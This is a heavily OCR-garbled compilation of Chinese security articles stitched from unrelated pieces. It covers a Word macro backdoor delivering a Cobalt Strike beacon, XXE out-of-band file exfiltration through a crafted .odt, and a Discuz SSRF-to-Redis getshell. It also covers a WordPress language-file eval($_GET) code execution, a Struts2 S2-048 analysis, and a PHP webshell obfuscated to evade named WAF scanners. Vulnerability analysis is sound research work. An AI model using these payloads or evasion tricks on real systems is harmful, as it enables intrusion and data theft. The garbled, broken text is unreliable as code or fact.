诱导 目标 手动 点 击 " 启 用 内 容 " 宏 。 


td * Macro Backdoor.doc [兼容 模式 ] - Word 
x n s 设计 MEL E -- — MENTO 1 E 
» m fjssm eu Ga) b 设计 模式 = 
EEE ES i I j d . i$ aa T BEE ACER j 
Visual Basic & y W Word COM MSI n Eeg XML mate 
ZRS FT MEUR g- 
M MER Ee Bet 
| £234 TOEA RIS 


Macro backdoor ! 


目标 一 旦 启用 ，CobaltStrike 的 Beacon 就 会 上 线 ， 即 成 功 接收 到 Shell。 
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ike View Attacks Reporting Help 
ngzonmt»ucoeBoooaBo 


computer 




















192.168.144.159@4904 X | 





sleep 10 
tasked beacon to sleep for 10s 
,con> shell whoami 
tasked beacon to run: whoami 
host called home, sent: 53 bytes 
received output 
-63f4ss3j4q8\administrator 





C6baltStrike 生 成 默认 的 VBA 会 导入 四 个 Windows API 函 数 ， 常 见 的 Shellcode 加 载 器 代码 : 





e CreateRemoteThread 创建 一 个 在 其 它 进程 地 址 空间 中 运行 的 线程 (也 称 :创建 远程 线程 )， 


* VirtualAllocex 指定 进程 的 虚拟 空间 保留 或 提交 内 存 区 域 
* WriteprocessMemory 写 入 某 一 进程 的 内 存 区 域 
* CreateProcess 创建 一 个 新 的 进程 和 它 的 主线 程 ， 这 个 新 进程 运行 指定 的 可 执行 文件 





其 中 Array( -4, -24, -119,0,0,0, 96, -119, -27,,， 就 是 Shellcode， 混 淆 的 办 法 有 很 多 种 。 
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Java-security-calendar-2019-Candy-Cane 


0x01 概述 


今年 RIPS 更 新 一 套 Java 的 年 日 历 ，17 年 是 PHP 的 内 容 ，18 年 是 WordPress 的 内 容 ， 实际 上 也 是 要 
些 PHP， 本 着 自己 今年 在 学 习 Java 的 节奏 ， 所 以 试 着 跟 一 跟 ， 调 试 一 些 有 趣 的 东西 。 


0x02 漏洞 分 析 


实际 上 这 也 是 RIPS 一 如 即 往 的 简洁 ， 一 样 看 上 去 实际 上 就 知道 这 个 和 XXE 有 关系 ， 第 9 行 获取 = 
个 叫做 uploaded office doc.odt 文件 ， 调 用 ZipEntry 来 解析 这 个 文件 ， 获 取 压 缩 包 中 一 个 叫 知 
content.xml 文件 ， 通 过 org.jdom2.Document 方法 来 解析 这 个 XML 文件 ， 一 眼 就 看 到 有 XXE 的 
问题 。 实 际 上 下 面 这 部 分 代码 在 Java 中 比较 常见 的 场景 是 Apache POI 等 excel 文件 解析 ， 可 能 会 
导致 解析 office 文 件 内容 的 一 些 xml 文 件 的 时 候 出 现 XXE 的 问题 。 





org. jdom2 .Content ; 

org. jdom2. Document ; 

org. jdom2.JDOMException; 
org. jdom2. input . SAXBuilder; 


ImportDocument { 


ta ring extractString() throws IOException, JDOMException { 
File initialFile w File( "uploaded office doc.odt"); | 
InputStream in w FileInputStream( initialFile); 

il ZipInputStream zis iew ZipInputStream( in); 
ZipEntry entry; 
List<Content> content = null; 
hile ((entry = zis getNextEntry t= null f 

t (entry.getName( ).equals({“content.xmt")) { 

ial SAXBuilder sax = new org.jdom2. input. SAXBuilder( ): 


Sax. setFeature("http://javax.xml.XMLConstants/feature/secure-processing true); 
(Document doc = sax.build(zis); | 

(content = doc.getContent(); 

zis.close(); un 


break; 
} 
} 
StringBuilder sb = new StringBuilder( ); 
if (content t= null) 
for(Content item : content){ 
Sb.append(item.getValue( )); 
} 
} 
return sb. toString(); 





FO) 












件 是 哈 ， 百 度 出 来 是 这 个 东西 ? 





* 7 » 
ODT =C 
ys 下 使 用 office 直接 保存 odt 文件 就 完事 了 。 
XE testlodt E 
LI 类 型 [T); OpenDocument XÆ (*.odt) 
cs tad. Gps 
OFF 
HAEA ZipEntry 来 解析 这 个 文件 ? 
上 我 用 压缩 文件 方式 打开 之 后 如 下 所 示 ， 嗯 看 了 图 大 家 都 知道 了 。 
Ü testodt - 解 包 六 小 为 11,7 KB 
Zea TAE XE nam 
xm 
XE 2019-12-08 21:53 





1980-01-01 00:00 
1980-01-01 00:00 
1980-01-01 00:00 
1980-01-01 00:00 
1980-01-01 00:00 









怎么 做 这 个 恶意 odt 文件 ? 


图 中 的 xm 文件 内 容重 命名 为 contentxml ， 覆盖 压 缩 包 中 的 xml 文件 即 可 。 


xml version="1.0" encoding="ISO0-8859-1"?> 
IDOCTYPE foo [ 

PELEMENT text ANY > 

BENTITY xxe SYSTEM "http://127.0.0.1:8888" >]> 
loc»&xxe; «/doc» 
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(RER 











Ifa 
META.INE Emme 
puoi EUER 08 21:53 
content.xml P ETTR: tes a 
~i Un 
meta.xml esc M p 
TERRIA 31 0098 
mimetype . 
i | 2 32 oH vi 9000 
settings.xmi 2 2 2 zx Po 
: “| 00:99 
styles.xml Suma. ^ k 
TRES 01 ogg 
FRAS 





0x03 AAA 


运行 之 后 自然 会 触发 XXE 的 问题 了 。 


main(String[] args) /s IOException, JDOMException { 
ath= System. getProperty ( Je oul vi/test.od 
Atin( filepath) python -m SimpleHTTPServer 8888 (Python) 
: File(filepath) "eem "P . 
IhputStrean( initialFili 7 nO TQ nn Locals 
ZipInputStrean(i ^ PY -m SimpleHTTPServer 8888 

Serving HTTP on 0.0.0.0 port 8888 ... 

127.0.0.1 - - [08/Dec/2019 22:05:10] "GET / HTTP/1.1" 200 
TERN | 


这 里 还 有 一 个 进一步 的 利用 方式 ， 项 目 来 自 ， 利 用 JDK 自 身 CVE-2017-3533 ， 可 通过 外 带 读 
取 数 据 。 


Pe BTE URL 
loda ecu. 


version 1.1 


info: Old DTD found. This file is going to be deleted. 

info: Generating new DTD file. 

info: Starting xxer_httpd on port 8080 

info: Starting xxer_ftpd on port 2121 

info: Servers started. Use the following payload (with URL-encoding): 


<?xml version="1.0" encoding="UTF-8"?><!DOCTYPE xmlrootname [«!ENTITY % aaa SYST 
EM "http://127.0.0.1:8080/ext.dtd">%aaa;%ccc;%ddd; ]> 


将 下 面 内 容 制 作为 content.xml , Æ% odt 文件 中 的 content.xml 。 


<?xml version="1.0" encoding="UTF-8"?><!DOCTYPE xmlrootname [<!ENTITY % aaa SYST 


> 


看 一 看 ext.dtd 内 容 ， 实 际 上 是 通过 file:// 读 取 tmp 的 文件 ， 然 后 给 服务 端 返回 。 
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Node 
ount 


power 
sangf 


stop. 
tunne 


IZA 


DiENTITY % bbb SYSTEM "file:///tmp/"><!ENTITY X ccc "«!ENTITY &#37; ddd SYSTEM ' 


127.0.0.1 - - [10/Dec/2019 17:08:01] "GET /ext.dtd HTTP/1.1" 200 - 
fo: FTP: recvd 'USER fakeuser' 
ifo: FTP: recvd ‘PASS .keystone install lock 


5. PGSQL. 5432 
5. PGSQL. 5432. lock 
5. PGSQL. 5433 
_ 5. PGSQL. 5433. lock 
,\dobegc. log 
AlTestl.err 
AlTest1.out 
„apple. launchd. SIpLONvQQy 
m.sangfor.ca.sha 
.sangfor. lockcert 
com. sangfor. lockecagent 
com. Sogou. inputmethod 
iNode 
mounter-log. log 
power Log 
sangfor.ec.rundata 
stop easyconnect.sh 
tunnelblick-installer-log.txt 
yjp201709051529. jar' 





AlTesti.err 
AlTest1.out 
adobegc. log 
com. apple. Launchd. SIpLONvQQy 
com. sangfor.ca. sha 
m. sangfor. lockcert 
1. sangfor: lockecagent 
com. Sogou. inputmethod 





mounter-log. log 

powerlog 

sangfor.ec.rundata 

Stop easyconnect.sh 
tunnelblick-installer-log.txt 
yjp201709051529. jar 





MORIAR EB), CHRIS, ZBÜPUmTfS TE ERE 


idk1.8.0 112.jdk:sun.net.ftp.impl.FtpClient 中 的 issueCommand 方法 
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m private boolean issueCommand(String vari) throws JOException { 
if (!this.isConnected()) { 
throw new IllegalStateException("Not connected"); 
) else { 
if (this.replyPending) { 
try { 
this.completePending(); 
} catch (FtpProtocolException var3) { 


, 


} 


this.sendServer(var1 + “\r\n"); 
return this.readReply(); 


jdk1.8.0_131.jdk:sun.net.ftp.impl.FtpClient 中 的 issueCommand 方法 








private boolean issueCommand(String vari) throws IOException, FtpProtocoll 
if (!this.isConnected()) { 
throw new IllegalStateException("Not connected"); 
] eise ( 
if (this.replyPending) ( 
try ( 
this.completePending(); 
} catch (FtpProtocolException var3) { 


if (vari.indexOf(19) != -1) ( 
FtpProtocolException var2 = new FtpProtocolException(’!) legal 
var2.initCause(new IllegalArgumentException("iliegal carriage f 
throw var2; 

} else ( 
this.sendServer(vari + "\r\n"); 
return this.readReply(); 


也 就 是 在 这 里 命中 Nn 会 初始 化 FtpProtocolException 抛 出 一 个 Illegal FTP command 的 异常 
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由 于 在 sun.net.www.protocol.ftp.FtpURLConnection 方法 中 遇 到 异常 会 抛 出 "Invalid 
攻 Ername/password"， 因 此 这 里 的 利用 自然 会 抛 出 这 个 。 


. ftp. LOGINI .user, .password == fr = . pe 
} (FtpProtocolException vars) { 
.ftp.close(); 
FtpLoginException( js 


"P BL REA SUFT P Pm Piste Aa FB HS 


issueCommand:534, FtpClient (sun.net.ftp.impl) 
issueCommandCheck:550, FtpClient (sun.net.ftp.impl) 
tryLogin:1036, FtpClient (sun.net.ftp.impl) 

login:1056, FtpClient (sun.net.ftp.impl) 

connect:311, FtpURLConnection (sun.net.www.protocol.ftp) 
getInputStream:400, FtpURLConnection (sun.net.www.protocol.ftp) 


根据 @LeadroyaL 文章 中 的 内 容 


»decodePath( -url.getPath()) 
t > PETER SHE T= SS type ! 
{ „type 1) { 
- ftp, setAsciiTypel) 


pathname) 
FtpURLConnectio 
RSG inten as. ) 


F tpURLConnec tion. FtpInputSt ream( 


FrpuRLConnection. FtpInputStream( 


0x04 漏洞 修复 


之 前 聊 过 XXE， 很 简单 加 一 条 这 个 限制 DTD 就 完事 了 。 


i main(Stringl] args) throws IOException, 


string j filepath- System. gerbrepenept i rn dirt!) + 


File ini ialFile y iFile(filepath) 
InputStream in = new FileInputStream(initialFile); 
\ ZiplnputStream zis = new ZipInputStream(in); 
ZipEntry entry; 
List<Content> content = ; 
((entry = zis. getNextEntry()) ! 


{entry.getName(}.equals 
final SAXBuilder sax 


Reference 


TA 


„ftp 


,ftp 


JDOMException { 


. list ((String) 


ameList( 


I» 


, filename) ) 





Tedis 后 , 





gus, RI 







scus 支 持 多 种 缓存 方式 (redis, memcache) ， 而 一 般 情况 下 ， 大 多 数 都 会 将 redis 或 memcache 
装 在 本 地 ， 而 且 默 认 安装 的 redis 是 可 以 直接 访问 的 ， 不 需要 账号 密码 ， 这 里 就 有 一 个 潜在 的 问 

， 如 果 discuz 的 安全 性 得 不 到 保证 ， 存 在 ssrf， 那 么 有 几率 导致 ssrf 操 作 redis 从 而 修改 缓存 注入 我 
] 自 己 的 代码 。 


， 我 们 需要 修改 discuz 中 config/config_golbal.php 文 件 ， 修 改 里 面 关于 redis 的 设置 。 当 启用 了 
sdis 后 ，discuz 会 将 缓存 存放 在 $_G 中 。 


£i messe KELLS 5g 





4eEAMZE NASR RAR AON, APRA ERAS 





Ege EBNISSOYIEUS Memecache,. eAccelerator, Alternative PHP CachefAPC). Xc 


内存 接口 的 主要 设置 位 于 config global.php HO, fSISIDUETHSE config global.php Wi 





memcache Tx 关闭 
APC AEH 
Xcache ALES 
eAccelerator ASS 
cach 不 支持 


下 来 我 们 来 分 析 具 体 代码 source\class\discuz\discuz_application. php 
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private function init setting() { i" 
if(S$this-»init setting) { 
if(empty($this->var['setting'])) { 
$this-»cachelist[] = 'setting'; 


if(empty($this->var['style'])) { 
$this->cachelist[] = 'style default'; 


} 

if(!isset($this-»var['cache']['cronnextrun'])) { 
$this-»cachelist[] = 'cronnextrun'; 

} 


} 
!empty($this->cachelist) && loadcache($this->cachelist); 


if(!is_array($this->var['setting'])) { 
$this->var['setting'] = array(); 


调用 缓存 的 地 方 source\function\function_core.php 


function output_replace($content) { 
global $ G; 
if(defined('IN MODCP') || defined('IN ADMINCP')) return $content, 
if(!empty($ G['setting']['output']['str']['search'])) { 


if(empty($ G['setting'] 
['domain']['app']['default'])) { 
$ G['setting']['output']['str']['replace'] = str_replace('{CURHOST}' 





} 
$content = str replace($ G['setting']['output']['str']['search'], $ G['s 
} 
if(!empty($ G['setting']['output']['preg']['search']) ; (empty($ G['setting' 
if(empty($ G['setting']['domain']['app']['default'])) ( 
$ G['setting']['output']['preg']['search'] = str replace( 'N(CURHOSTV 
$ G['setting']['output']['preg']['replace'] = str replace('(CURHOST) 
5 
$content = preg replace($ G['setting']['output']['preg']['search'], $ 6[ 
} 


return $content; 


根据 代码 我 门 可 以 看 到 ， 调 用 缓存 的 时 候 


$ G['setting']['output']['preg']['search'], $ _G['setting']['output']['preg'] 
['replace'] 
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4 By 
ee 


j， 所 以 ， 我 们 修改 掉 这 2 个 地 方 的 缓存 就 可 以 达到 一 个 getshell 的 效果 。 但 是 有 个 前 提 就 
站 需要 一 个 ssrf。 最 后 ， 笔 者 在 这 里 选择 了 以 下 这 个 ssr 点 。 


|, php?mod=aj ax&amp;action-downremoteimg&amp; message=[img=1,1]http:// 你 的 
f .php?.jpg[/img]&amp;formhash-818c8f44 


我 们 编写 自己 的 脚本 使 用 header (“location”) 的 方式 去 修改 redis， 为 什么 呢 ? 因为 直 
个 ssrf 点 输入 构造 好 点 语句 ， 会 被 discuz 的 waf 给 拦截 ， 这 就 会 导致 我 们 失败 。 所 以 不 能 直接 
这 个 ssrf 点 中 带 具体 的 代码 ， 网 上 有 资料 就 是 卡 在 这 。 我 们 需要 写 一 个 脚本 使 用 location 跳 转 
对 redis 的 请 求 。 








| 1721680116 


Quercus Ld NE: 


a 让 & prom @ etre Gas C nS cÈ vaw Civan- Basen 


c z! System Error 





前 的 访问 请 求 当中 含有 非法 字符 ， 已 经 被 系统 拒 雹 


这 里 ， 需 要 说 明 一 下 的 是 ，curl 在 7.35.0 (笔者 测试 的 版 本 ) 以 下 是 不 支持 gopher 协 议 的 ， 网 上 的 
料 可 能 并 没 遇 到 这 样 的 情况 所 以 这 个 地 方 是 最 容易 出 错 的 地 方 。 
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接 下 来 先 序 列 化 一 个 对 象 


Sa['output']['preg']['search']['plugins'] = "/.*/e"; 
$a['output']['preg']['replace']['plugins'] = 'phpinfo();'; 
Sa['rewritestatus']-1; 

$setting - serialize($a); 


但 是 这 里 有 个 问题 ， 我 们 修改 缓存 值 必 须知 道 缓存 前 级 ， 那 么 redis 在 2.6 以 上 开始 支持 lua 语 法 后 ， 
我 们 可 以 通过 eval 命 令 和 通配符 来 模糊 查找 下 setting 结 尾 的 key， 我 们 可 以 构造 一 个 以 下 的 语句 去 修 
改 _setting 结 尾 的 key 的 内 容 eval "local t=redis.call(‘keys’,’*_setting’);for i,v in 
ipairs(t) do redis.call('set',v,'aaaa') end;return 1;" 0 然后 我 们 编写 脚本 如 下 
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header ( 
for 


B ); 


并 将 代码 保存 到 你 的 服务 器 上 。 最 后 我 们 需要 访问 的 地 址 是 
http://192.168.80.116/forum. php?mod=ajax&action=downremoteimg& amp;message= 


[imgo=1,1]http:// 你 自己 的 服务 器 /ssrf .php?.jpg[/imgl& formhash-818c8f44 


注意 在 3.x 的 discuz 里 ， 这 里 的 formhash 需 要 带 上 ， 不 然 会 导致 非法 请 求 ， 而 且 formhash 有 生命 周 
WB. 然后 访问 。 为 了 验证 是 否 成 功 ， 我 们 在 服务 端 我 们 使 用 get 命 令 获 取 下 pwseting 只 的 内 容 ， 我 
BU IRB iF BI AS /JDW. 


/'9» get pw.setting 
ray Le {s: 4:\" 


[ Ws 
0 .0.1:6379 (a> 


成 功 修改 掉 了 redis 的 缓存 。 





然后 访问 http://xxx/forum.php?mod=ajax&inajax=yes&action=getthreadtypes 


‘Nal:{s:7:\"plugins\"; i 
W'phpinfo();N ;H1s:13: 


rewritestatus\" ; 
[/7.0.0.1:6379» 


漏洞 修复 


1、 升 级 到 最 新 的 discuz 版 本 。 2、 对 redis 设 置 账号 密码 访问 。 
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WordPress 语 言 文件 代码 执行 漏洞 分 析 报 告 
1. 漏 洞 简介 


WordPress 是 一 个 以 PHP 和 MySQL 为 平台 的 自由 开源 的 博客 软件 和 内 容 管理 系统 ， 近 日 在 gjthub 

( ) 上 爆 出 这 样 一 个 尝 
洞 ， 在 其 <=4.6.1 版 本 中 ， 如 果 网 站 使 用 攻击 者 提前 构造 好 的 语言 文件 来 对 网 站 、 主 题 、 插 件 等 等 
来 进行 翻译 的 话 ， 就 可 以 执行 任意 代码 。 


2. 漏 洞 影响 
任意 代码 执行 ， 但 有 以 下 两 个 前 提 : 


1. 攻击 者 可 以 上 传 自己 构造 的 语言 文件 ， 或 者 含有 该 语言 文件 的 主题 、 插 件 等 文件 夹 

2. 网 站 使 用 攻击 者 构造 好 的 语言 文件 来 对 网 站 、 主 题 、 插 件 等 进行 翻译 这 里 举 一 个 真实 场景 中 的 
例子 : 攻击 者 更 改 了 某 个 插件 中 的 语言 文件 ， 并 更 改 了 插件 代码 使 插件 初始 化 时 使 用 恶意 语言 
文件 对 插件 进行 翻译 ， 然 后 攻击 者 通过 诱导 管理 员 安 装 此 插件 来 触发 漏洞 。 


3. 影 响 版 本 : <= 4.6.1 


3. 漏 洞 复 现 


1. 环境 搭建 


dockerpullwordpress<spanclass="token punctuation">:</span><spanclass="token 
dockerpullmysql 

dockerrun <spanclass="token operator">--</span>namewp<spanclass="token opera 
dockerrun <spanclass="token operator"»--«/span»namewp <spanclass="token oper 


» 


2. 漏 洞 分 析 首先 我 们 来 看 这 样 一 个 场景 : 


> As cat 1 ,php 

<?php 

newfunc = create function('5a,Sb', ‘return Uy /*"); 
ho “New anonymous function: Snewfunc\n"; 

> {tmp php 1.php 


PHP Warning: Unterninated comment starting line 1 in /tmo/1.php(2) : cuntime-created function on line 1 
PHP Stack trace: 
PHP 1. {main}() /tno/i.php:9 
PHP 2. create_function() /tmp/i.php:2 
T 





ew anonymous function: lambda 1 


在 调用 create function 时 ， 我 们 通过 } 将 原 函 数 闭合 ， 添 加 我 们 想 要 执行 的 内 容 后 再 使 用 六 将 后 面 
不 必要 的 部 分 注释 掉 ， 最 后 即使 我 们 没有 调用 创建 好 的 函数 ， 我 们 添加 的 新 内 容 也 依然 被 执行 了 。 
之 所 以 如 此 ， 是 因为 create function 内 部 使 用 了 eval 来 执行 代码 ， 我 们 看 PHP 手 册 上 的 说 明 : 
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phitps: e " 
yw 
呈 下 来 我 们 看 Wordpress 中 一 处 用 到 create function 的 地 方 ， 在 wp- 
includes/pomo/translations.php 第 203-209 行 : 





中 的 
BR T <spanclass="token comment">/** 

T * Makes a function, which will return the right translation index, according to 

q * plural forms header 

* @param int $nplurals 

E Qparam string $expression 

T */«/span» 

— «spanclass-"token keyword">function</span> <spanclass="token function"»make plur 
<spanclass="token variable">$expression</span> <spanclass="token operator">= 
<spanclass="token variable">$func_body</span> <spanclass="token operator"»-« 

E \<span class="tokenvariable">$index</span> «span class-"tokenoperator'»- 
era <span class="tokenkeyword">return</span> <span class="tokenpunctuation"> 
ner <spanclass="token keyword">return</span> <spanclass="token function">create_ 


<spanclass="token punctuation">}</span> 

: i b 
| RESET) LB SIR EROS (IF FR RIES Gc E HAY plural forms 这 个 header 来 创建 函数 并 返回 ， 
其 中 $expression 用 于 组 成 $func_body , ifj $func body 作为 $code 参数 传 入 了 create function 
;所 以 关键 是 控制 $expresstion 的 值 。 我 们 看 一 下 正常 的 字体 文件 zh_CN.mo ， 其 中 有 这 么 一 
(OR 

202 MIME-Version: 1.0 

203 Content-Type: text/plain; charset=UTF-8 

204 Content-Transfer-Encoding: 8bit 


205 Plural-Forms: nplurals-1; plural; 
206 X-Generator: Poedit 1.8.7 
207. Project -Id-Version: 4.3.x 
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en i e 


Plural-Froms 这 个 header 就 是 上 面 的 函数 所 需要 处 理 的 ， 其 中 nplurals 的 值 即 为 Snplurare a 
而 plural 的 值 正 是 我 们 需要 的 Sexpression 的 值 。 所 以 我 们 将 字体 文件 进行 如 下 改动 : 1 
202 MIME-Version: 1.0 

203 Content-Type: text/plain; charset=UTF-8 

204 Content-Transfer-Encoding: 8bit 


205 Plural-Forms: nplurals-1; plural=n);}eval($_GET[c])B/:. 
206 X-Generator: Poedit 1.8.7 
207 Project-Id-Version: 4.3.x 


然后 我 们 在 后 台 重 新 加 载 这 个 字体 文件 ， 同 时 进 


524455% 3 90 oot 





am 


行动 





态 调试 ， 可 以 看 到 如 下 情景 : 


5 


function make plural form f 1 
$ Sexpre 1 

4 Saplura $ shplurà 
SIT OE ES bet | E 


我 们 payload 中 的 ) 首先 闭合 了 前 面 的 ( ， 然 后 ; 结束 前 面 的 语句 ， 接 着 是 我 们 的 一 句 话 木马 , 然 
后 用 * 将 后 面 不 必要 的 部 分 注释 掉 ， 通 过 这 样 ， 我 们 就 将 payload 完 整 的 传 入 了 create function , 
在 其 创建 浪 数 时 我 们 的 payload 就 会 被 执行 ， 由 于 访问 每 个 文件 时 都 要 用 这 个 对 字体 文件 解析 的 结果 
对 文件 进行 翻译 ， 所 以 我 们 访问 任何 文件 都 可 以 触发 这 个 payload: 


12270204 


tt 


PHP Version 5.5.9-1ubuntu4.19 





PHP Version 5.5.9-1ubuntu4.19 


H 
b 


System linux lab & .042 gerere 49-14 04. Handy SMP Wed Jun 25 
bie és 

+ : 

Buld Date — Al 08 2016 03037 

] + 










Server API Apache 7 9 Handier 
r t 

Virtual diated 
Directory | 

Sop | 

Configuration |/etc/phoS/apache? 
fie (hoi | 

Path i 
Loaded | Š 
Configuration 
Fia 









i 
i 


à H 
Scan this dir Heteipasiapac herjet d 
fee addtional | 
ini fites i 





其 中 访问 index.php?c-phpinfo(); 的 函数 调用 栈 如 下 : 
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tions.php:204, Cettext Translations-»make » plural form L function) 
ions.php:269, Gettext_Translations->set_header{) 

nslations. php:69, Translations-»set. headers() 

no.php:248, MO-»import. from reader() 

10.php:27, MO-»import. from file() 

php:564, load. textdomain() 

10n.php:649, load. default textdomoin/) 

yp-settings.php:364, require_ance() 

yp-config.php:89, require once) 

ipload.php:39, require once() 

log-header.php:13, require() 

.php:t7, (main)() 
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Struts2 远 程 命令 执行 S2-048 漏 洞 分 析 报 告 
1. 漏 洞 简介 


Struts2 是 一 个 基于 MVC 设 计 模 式 的 Web 应 用 框架 ， 它 本 质 上 相当 于 一 个 servlet， 在 MVC 设 计 科 
中 ，Struts2 作 为 控制 器 (Controller) 来 建立 模型 与 视 2 e PM K 
Struts2 的 一 个 远程 命令 执行 漏洞 ， 评 级 为 高 (hi tS ; 1 

2.3.x 版 本 上 的 Showcase SE NEUE A WSHGBERE LOS M TS 
攻击 。 漏 洞 成 因 是 当 ActionMessage 接 收 客户 可 控 的 参数 数据 时 ， 由 于 后 续 数 据 拼接 传递 后 处 理 巴 
当 导 致 任意 代码 执行 。 


2. 漏 洞 影响 


远程 命令 执行 ， 但 有 以 下 前 提 : Struts 2.3.x 使 用 了 官网 默认 的 struts2-showcase 应 用 


3. 影 响 版 本 






Struts 2.3.x 


4. 漏 洞 复 现 


1. 环境 搭建 本 地 搭建 apache tomcat + struts2-showcase.war 2. 漏 洞 分 析 本 次 漏洞 触发 点 l 
T£: org.apache.struts2.si.StrutsiAction.execute() 方法 中 ， 如 下 图 所 示 : 


public String execute() throws Exception { 
ActionContext ctx = ActionContext.getContext(); 
ActionConfig actionConfig = ctx. getActionInvocation().getProxy().getConfig(); 
Action action = null; 
try ( 
action = (Action) objectFactory.buildBean(className, null); 
} catch (Exception e) { 
throw new StrutsException("Unoble to create the legacy Struts Action", e, actionConfig); 
} 









Servlet( 


ry(Dispatcher.getInstance().getConfigurationManager().getConfigurationO); 
ctionMappingCactionConfig); 


$trutslFactory strutsFactory = new Struts1F 
ActionMapping mapping = StrutsFactory.cr 
HttpServletRequest request = Servlet Context. getRequest(); 
HttpServletResponse response = Serv tionContext.getResponse(); 
ActionForward forward = action.execute(mapping, actionForm, request, response); 


ActionMessages messages = (ActionMessages) request.getAttribute(Globals.MESSAGE KEY); 
if (messages != null) { 
for (Iterator i = messages.get(); i.hasNextQ; ) { 
ActionMessage msg = (ActionMessage) i.next(); 
if (msg.getValues() != null && msg.getValues().length > 0) { 
addActionMessage(getText(msq.getKey(), Arrays.aslist(msg.getValues()))); 
} else { 


addActionMessage(getText(msg.getKey())); 
$ 
i Co 
J 


org.apache.struts2.si.StrutsiAction 类 为 一 个 Wrapper 类 ， 用 于 将 Struts1 时 代 的 
Action 包装 成 为 Struts2 中 的 Action， 以 让 它们 在 struts2 框架 中 继续 工作 。 在 Struts1Action 
的 execute 方法 中 ， 会 调用 对 应 的 Struts1 Action 的 execute 方法 (第 一 个 红色 箭头 处 ) 。 在 


TIG 


























用 完 后 ， 会 检查 request 中 是 否 设 置 了 ActionMessage， 如 果 是 ， 则 将 会 对 action 
nessages 进行 处 理 并 回 显 给 客户 端 。 处 理 时 使 用 了 getText 方法 ， 这 里 就 是 漏洞 的 触发 点 。 
以 漏洞 的 触发 条 件 是 : 在 struts1 action 中 ， 将 来 自 客户 端的 参数 值 设置 到 了 action 
nessage rh, 在 官方 提供 的 Showcase 中 ， 就 存在 漏洞 ， 如 下 图 : 


gblic ActionForward execute(ActionMapping sopping, ActionForm form, HttpServletReguest reg , BttpServlet 





GongsterForm gform = (GangsterForm) form; 
ActionMessages messages = new ActionMessages(); 
messages.add("msg", new ActionMessage("Gangster " + gform.getNome() + " added successfully")); 
addMessages(reauest, messages); 


return mopping. findForward( “success” ); 


gettext 方法 的 主要 作用 就 是 实现 网 站 语言 的 国际 化 ， 它 会 根据 不 同 的 Locale 去 对 应 的 资源 文 
件 里 面 获取 相关 文字 信 息 (这 些 文件 信息 一 般 保存 在 properties 文件 中 ) ， 这 些 文字 信息 往往 
会 回 显 至 客户 端 。 Action messages 会 通过 getText 方法 最 终 进入 

com. opensymphony. xwork2.util.LocalizedTextUtil.getDefaultMessage(String, 
Locale, ValueStack, Object[], String) 方法 ， 如 下 : 


* 
D. E 

Private static GetDelouitMessogeReturnArg getÜefaultMessage( String key, Locole e, Volue$tock v e$taück, Goject{? 
j tring defaultMessoge) ( 
GetDefaui Coton result a nuli; 
beolean found 


if (key te nuli) + 
nAn MOSES ~ findDefoyultTexttxes, 


Dt 


jb tSAessage s 





if (message te mull} ( 
MessageFormat =f = botldMessogelormot(TextPorseütil transiateVariobles(messoge, volweStace}, locale); 


ering » formatWithWullDetectiont* 3785). 
jit = new GetDefouitMess, eim "Ar ne 
} 
} 


”此 方法 会 将 action message 传 入 

com.opensymphony.xwork2.util.TextParseUtil.translateVariables(String, 
ValueStack) o com.opensymphony.xwork2.util.TextParseUtil.translateVariables( 
String, ValueStack) 方法 主要 用 于 扩展 字符 串 中 由 $( 或 0} ER OGNL 表达 式 ， 这 里 
也 就 是 OGNL 的 入 口 ， 随 后 action message 将 进入 OGNL 的 处 理 流 程 ， 漏 洞 被 触发 。 


paren 


1. 升级 Apache Struts 到 2.5.10.1 最 新 版 本 。 

2 避免 使 用 Apache struts2-struts1-plugin 这 个 插件 。 非 必要 的 情况 下 可 以 将 Apache struts2- 
struts1-plugin-2.3.x.jar 文 件 从 “WEB-INF/lib" 目 录 中 直接 删除 。 如 果 使 用 该 插件 时 避免 使 用 拼 
接 的 方式 将 原始 消息 直接 传递 给 ActionMessage。 
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静态 免 杀 php 一 句 话 (已 过 D 盾 ， 河 马 ， 安 全 狗 ) 


waf 对 于 eval 函 数 中 是 否 有 $ 变 量 比较 敏感 ， 只 要 eval 中 存在 $， 就 会 爆 可 疑 后 门 ， 所 以 需要 想 办 沉 
形 下 ， 最 好 变 成 eval(function()) 


<?php 
function a() 
t 
return "/*asdas*/".$ POST['a']; 


} 
eval(a()); 











shell - 记事 本 Dj v2.1.5.4 (iit Be) 
| http:/ /www.d99net.net 
| * Time: 13:19 
Ex puse 
| 
1 aAA AIG 0 00 种 
| function a0 AUSF 1 友 现 本钱 文件 P 用 时 o 00} 

» * TT Yi c& à 

return  '*asdasdsas* '.$ POST| a | Xf CUMEMEUOHND DE. RA inm E zd 
| ) c \users\admisa strator desktop ERIM shell 4 /— (QUE Eval Bi] Edif Itseasst $ SETU id 1") [Eeva 
lSa = " *aaaaa* ^. $ GET( id’), 
eval (Sa) 
| 

DAS v2.1.5.4 (Mia Be) 





|" shell - 记事 本 


V DM soon pene meson: 
http:/ /www.d99net.net 

piss 2 

TOME ! 发 珊 可 每 六 件 0 用 时 0 00 秒 o 


文件 EOMER WA 识 明 大 小 — Wm 


return "/*asdasdsas* ".$ POST[ a ] 


$a = "'*aaaaa*/". $ GETU id’); 








?php 
up Didi wos” pes me Mpx 
function al) 文件 名 E] 
fy 。 1 C:/Users/Admim str ator/Beskt op/ PREIE / shell. php 
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安全 狗 ， 他 对 eval 函 数 的 检测 更 严格 ， 这 里 使 用 php 自 带 的 函数 替换 $_POST 


OW v2.1.5.4 [测试 版 } 


V DE EDSN. RAO RP 





http: / /www.d99net.net 










* Date: 2019 
* Time: 13:19 
* nei 
Eo ATIA 1 发 现 可 竹 广 件 0 用 时 0 ooh oes 
io $ GETU TE 
E ce 文件 CHHARAYE LN X fan 


d 


Result for shell.zip 


$ 


SHAt 
MO5 
Size 

Version 

















“扫描 已 完成 ， 未 发 现 网 页 木马 及 其 他 危险 文件 ! 


LL GE 





网 页 本 马 网 页 挂 马 Pirat BC SH 


文件 名 





echo ” /*aaaaaa¥’”.$ GET[ id']; 
eval(ob get contents) 
ob flushO; 
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金融 信息 系统 安全 测评 方法 
1. 概 述 


随 着 大 数据 、 云 计算 、 人 工 智能 及 区 块 链 等 新 兴 技术 的 应 用 ， 银 行业 手机 银行 、 微 信 银 行 等 新 兴 
通过 安全 测评 过 程 ， 全 面 分 析出 信息 系统 可 能 存在 的 人 为 破坏 场景 及 其 成 因 与 后 果 ; 通过 科学 有 
具体 任务 如 下 : | 
， 全 面 识别 系统 的 功能 点 和 信息 点 以 及 其 所 依赖 的 基础 架构 和 基础 设施 
